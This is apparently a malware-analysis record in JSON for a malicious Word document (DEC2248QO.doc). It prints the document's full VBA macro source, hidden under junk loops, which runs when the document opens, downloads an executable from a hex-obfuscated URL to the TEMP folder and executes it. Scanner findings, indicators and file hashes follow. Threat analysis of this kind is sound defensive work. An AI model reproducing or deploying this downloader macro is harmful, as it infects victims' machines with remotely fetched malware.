82\r\nDoEvents: vHqDywtf = vHqDywtf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim VWsUAVut As Integer\r\nVWsUAVut = 9\r\nDo While VWsUAVut < 43\r\nDoEvents: VWsUAVut = VWsUAVut + 1\r\nLoop\r\n\r\nDoEvents: GHfjoXwI = GHfjoXwI + 1\r\n\r\nDim gXfkXukq As Integer\r\n\r\nDim cBxGPnur As Integer\r\ncBxGPnur = 2\r\nDo While cBxGPnur < 22\r\nDoEvents: cBxGPnur = cBxGPnur + 1\r\nLoop\r\n\r\ngXfkXukq = 3\r\nDo While gXfkXukq < 73\r\n\r\nDim IOhlZkQp As Integer\r\nIOhlZkQp = 4\r\nDo While IOhlZkQp < 48\r\nDoEvents: IOhlZkQp = IOhlZkQp + 1\r\nLoop\r\n\r\nDoEvents: gXfkXukq = gXfkXukq + 1\r\n\r\nDim ZlyyQbrA As Integer\r\nZlyyQbrA = 3\r\nDo While ZlyyQbrA < 74\r\nDoEvents: ZlyyQbrA = ZlyyQbrA + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DrVPZjIU As Integer\r\nDrVPZjIU = 5\r\nDo While DrVPZjIU < 81\r\nDoEvents: DrVPZjIU = DrVPZjIU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim qhAjHodv As Integer\r\n\r\nDim vKVKSKJC As Integer\r\nvKVKSKJC = 3\r\nDo While vKVKSKJC < 83\r\nDoEvents: vKVKSKJC = vKVKSKJC + 1\r\nLoop\r\n\r\nqhAjHodv = 9\r\nDo While qhAjHodv < 43\r\n\r\nDim PZHwRIwe As Integer\r\nPZHwRIwe = 7\r\nDo While PZHwRIwe < 19\r\nDoEvents: PZHwRIwe = PZHwRIwe + 1\r\nLoop\r\n\r\nDoEvents: qhAjHodv = qhAjHodv + 1\r\n\r\nDim gCzEGztZ As Integer\r\ngCzEGztZ = 1\r\nDo While gCzEGztZ < 12\r\nDoEvents: gCzEGztZ = gCzEGztZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim nUMuULOI As Integer\r\nnUMuULOI = 3\r\nDo While nUMuULOI < 38\r\nDoEvents: nUMuULOI = nUMuULOI + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub Workbook_Open()\r\n\r\nDim AlqbZoUs As Integer\r\n\r\nDim RuhoEKkH As Integer\r\n\r\nDim dsDIRhxi As Integer\r\ndsDIRhxi = 1\r\nDo While dsDIRhxi < 42\r\nDoEvents: dsDIRhxi = dsDIRhxi + 1\r\nLoop\r\n\r\nRuhoEKkH = 6\r\nDo While RuhoEKkH < 43\r\n\r\nDim jFHxcspk As Integer\r\njFHxcspk = 1\r\nDo While jFHxcspk < 57\r\nDoEvents: jFHxcspk = jFHxcspk + 1\r\nLoop\r\n\r\nDoEvents: RuhoEKkH = RuhoEKkH + 1\r\n\r\nDim wfydWqpb As Integer\r\nwfydWqpb = 4\r\nDo While wfydWqpb < 25\r\nDoEvents: wfydWqpb = wfydWqpb + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tiYpRELi As Integer\r\ntiYpRELi = 2\r\nDo While tiYpRELi < 27\r\nDoEvents: tiYpRELi = tiYpRELi + 1\r\nLoop\r\n\r\nAlqbZoUs = 3\r\nDo While AlqbZoUs < 64\r\n\r\nDim SqbbyDua As Integer\r\n\r\nDim yBlsPRDQ As Integer\r\nyBlsPRDQ = 8\r\nDo While yBlsPRDQ < 82\r\nDoEvents: yBlsPRDQ = yBlsPRDQ + 1\r\nLoop\r\n\r\nSqbbyDua = 7\r\nDo While SqbbyDua < 78\r\n\r\nDim OTnOGyJR As Integer\r\nOTnOGyJR = 4\r\nDo While OTnOGyJR < 48\r\nDoEvents: OTnOGyJR = OTnOGyJR + 1\r\nLoop\r\n\r\nDoEvents: SqbbyDua = SqbbyDua + 1\r\n\r\nDim aTZbxDek As Integer\r\naTZbxDek = 1\r\nDo While aTZbxDek < 49\r\nDoEvents: aTZbxDek = aTZbxDek + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EfRdRuRJ As Integer\r\nEfRdRuRJ = 3\r\nDo While EfRdRuRJ < 73\r\nDoEvents: EfRdRuRJ = EfRdRuRJ + 1\r\nLoop\r\n\r\nDoEvents: AlqbZoUs = AlqbZoUs + 1\r\n\r\nDim fBalzqNT As Integer\r\n\r\nDim pbTqSExS As Integer\r\npbTqSExS = 3\r\nDo While pbTqSExS < 97\r\nDoEvents: pbTqSExS = pbTqSExS + 1\r\nLoop\r\n\r\nfBalzqNT = 3\r\nDo While fBalzqNT < 64\r\n\r\nDim YVCJKqII As Integer\r\nYVCJKqII = 6\r\nDo While YVCJKqII < 42\r\nDoEvents: YVCJKqII = YVCJKqII + 1\r\nLoop\r\n\r\nDoEvents: fBalzqNT = fBalzqNT + 1\r\n\r\nDim JPYiWagU As Integer\r\nJPYiWagU = 6\r\nDo While JPYiWagU < 21\r\nDoEvents: JPYiWagU = JPYiWagU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim lxkhTbul As Integer\r\nlxkhTbul = 4\r\nDo While lxkhTbul < 78\r\nDoEvents: lxkhTbul = lxkhTbul + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OZXQDGNw As Integer\r\n\r\nDim JSvDIoAQ As Integer\r\nJSvDIoAQ = 8\r\nDo While JSvDIoAQ < 22\r\nDoEvents: JSvDIoAQ = JSvDIoAQ + 1\r\nLoop\r\n\r\nOZXQDGNw = 7\r\nDo While OZXQDGNw < 19\r\n\r\nDim teaRGXXQ As Integer\r\nteaRGXXQ = 2\r\nDo While teaRGXXQ < 55\r\nDoEvents: teaRGXXQ = teaRGXXQ + 1\r\nLoop\r\n\r\nDoEvents: OZXQDGNw = OZXQDGNw + 1\r\n\r\nDim jGPMKSAO As Integer\r\njGPMKSAO = 1\r\nDo While jGPMKSAO < 19\r\nDoEvents: jGPMKSAO = jGPMKSAO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rqjmqefl As Integer\r\nrqjmqefl = 1\r\nDo While rqjmqefl < 84\r\nDoEvents: rqjmqefl = rqjmqefl + 1\r\nLoop\r\n\r\n    FUJdsfFF\r\nEnd Sub\r\nSub pHUgdsf()\r\n\r\nDim YMcAptkZ As Integer\r\n\r\nDim nElVlNph As Integer\r\n\r\nDim ouChrOFS As Integer\r\nouChrOFS = 2\r\nDo While ouChrOFS < 65\r\nDoEvents: ouChrOFS = ouChrOFS + 1\r\nLoop\r\n\r\nnElVlNph = 3\r\nDo While nElVlNph < 37\r\n\r\nDim CZRGcNnw As Integer\r\nCZRGcNnw = 9\r\nDo While CZRGcNnw < 39\r\nDoEvents: CZRGcNnw = CZRGcNnw + 1\r\nLoop\r\n\r\nDoEvents: nElVlNph = nElVlNph + 1\r\n\r\nDim MMrGXtII As Integer\r\nMMrGXtII = 6\r\nDo While MMrGXtII < 61\r\nDoEvents: MMrGXtII = MMrGXtII + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MHcjbtTC As Integer\r\nMHcjbtTC = 6\r\nDo While MHcjbtTC < 69\r\nDoEvents: MHcjbtTC = MHcjbtTC + 1\r\nLoop\r\n\r\nYMcAptkZ = 6\r\nDo While YMcAptkZ < 65\r\n\r\nDim AbSvXauR As Integer\r\n\r\nDim arSpIiDI As Integer\r\narSpIiDI = 1\r\nDo While arSpIiDI < 73\r\nDoEvents: arSpIiDI = arSpIiDI + 1\r\nLoop\r\n\r\nAbSvXauR = 5\r\nDo While AbSvXauR < 37\r\n\r\nDim UkEMzRUw As Integer\r\nUkEMzRUw = 7\r\nDo While UkEMzRUw < 45\r\nDoEvents: UkEMzRUw = UkEMzRUw + 1\r\nLoop\r\n\r\nDoEvents: AbSvXauR = AbSvXauR + 1\r\n\r\nDim RIeMAIHI As Integer\r\nRIeMAIHI = 4\r\nDo While RIeMAIHI < 76\r\nDoEvents: RIeMAIHI = RIeMAIHI + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim rFtFCsKb As Integer\r\nrFtFCsKb = 8\r\nDo While rFtFCsKb < 52\r\nDoEvents: rFtFCsKb = rFtFCsKb + 1\r\nLoop\r\n\r\nDoEvents: YMcAptkZ = YMcAptkZ + 1\r\n\r\nDim GKtegDZc As Integer\r\n\r\nDim lNubgLMm As Integer\r\nlNubgLMm = 2\r\nDo While lNubgLMm < 22\r\nDoEvents: lNubgLMm = lNubgLMm + 1\r\nLoop\r\n\r\nGKtegDZc = 5\r\nDo While GKtegDZc < 98\r\n\r\nDim KNTIrcol As Integer\r\nKNTIrcol = 6\r\nDo While KNTIrcol < 62\r\nDoEvents: KNTIrcol = KNTIrcol + 1\r\nLoop\r\n\r\nDoEvents: GKtegDZc = GKtegDZc + 1\r\n\r\nDim fADzmtxi As Integer\r\nfADzmtxi = 3\r\nDo While fADzmtxi < 69\r\nDoEvents: fADzmtxi = fADzmtxi + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim YlwwqGKp As Integer\r\nYlwwqGKp = 6\r\nDo While YlwwqGKp < 17\r\nDoEvents: YlwwqGKp = YlwwqGKp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CXflHUkI As Integer\r\n\r\nDim rOZLfbfA As Integer\r\nrOZLfbfA = 8\r\nDo While rOZLfbfA < 26\r\nDoEvents: rOZLfbfA = rOZLfbfA + 1\r\nLoop\r\n\r\nCXflHUkI = 7\r\nDo While CXflHUkI < 19\r\n\r\nDim WQLYXSGt As Integer\r\nWQLYXSGt = 7\r\nDo While WQLYXSGt < 17\r\nDoEvents: WQLYXSGt = WQLYXSGt + 1\r\nLoop\r\n\r\nDoEvents: CXflHUkI = CXflHUkI + 1\r\n\r\nDim jsaNfleM As Integer\r\njsaNfleM = 4\r\nDo While jsaNfleM < 14\r\nDoEvents: jsaNfleM = jsaNfleM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n    pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = HlFdNIYK + 1\r\nLoop\r\n\r\n    pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n    DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n   Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n    eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n    \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n    num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n    Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n    y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
        "analysis": {
          "VBA String": [],
          "Dridex String": [],
          "Suspicious": [
            [
              "Hex Strings",
              "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
            ],
            [
              "Chr",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "StrReverse",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "Shell",
              "May run an executable file or a system command"
            ],
            [
              "Environ",
              "May read system environment variables"
            ],
            [
              "URLDownloadToFileA",
              "May download files from the Internet"
            ],
            [
              "Lib",
              "May run code from a DLL"
            ]
          ],
          "Hex String": [
            [
              "\\vGJsdfbJHKdsf.exe",
              "5C76474A736466624A484B6473662E657865"
            ],
            [
              "TEMP",
              "54454D50"
            ]
          ],
          "Form String": [],
          "Base64 String": [],
          "AutoExec": [
            [
              "Workbook_Open",
              "Runs when the Excel Workbook is opened"
            ],
            [
              "AutoOpen",
              "Runs when the Word document is opened"
            ]
          ],
          "IOC": [
            [
              "94.136.57.72",
              "IPv4 address (obfuscation: StrReverse+Hex)"
            ],
            [
              "vGJsdfbJHKdsf.exe",
              "Executable file name (obfuscation: Hex)"
            ],
            [
              "http://94.136.57.72:8080/mopsi/popsi.php",
              "URL (obfuscation: StrReverse+Hex)"
            ]
          ]
        }
      }
    },
    "module": null,
    "date": {
      "$date": 1490354278607
    },
    "file": {
      "owners": [
        "cert",
        "*"
      ],
      "sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
      "names": [
        "DEC2248QO.doc"
      ],
      "probable_names": [],
      "parent_analyses": [],
      "antivirus": {},
      "sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
      "detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
      "mime": "application/msword",
      "analysis": [
        {
          "$oid": "58d4f256014ed28a5d50c113"
        }
      ],
      "groups": [
        "cert",
        "*"
      ],
      "_id": {
        "$oid": "58d4f256014ed28a5d50c112"
      },
      "type": "word",
      "md5": "757e9b7209f0d6ef3cf7bfd904445009"
    },
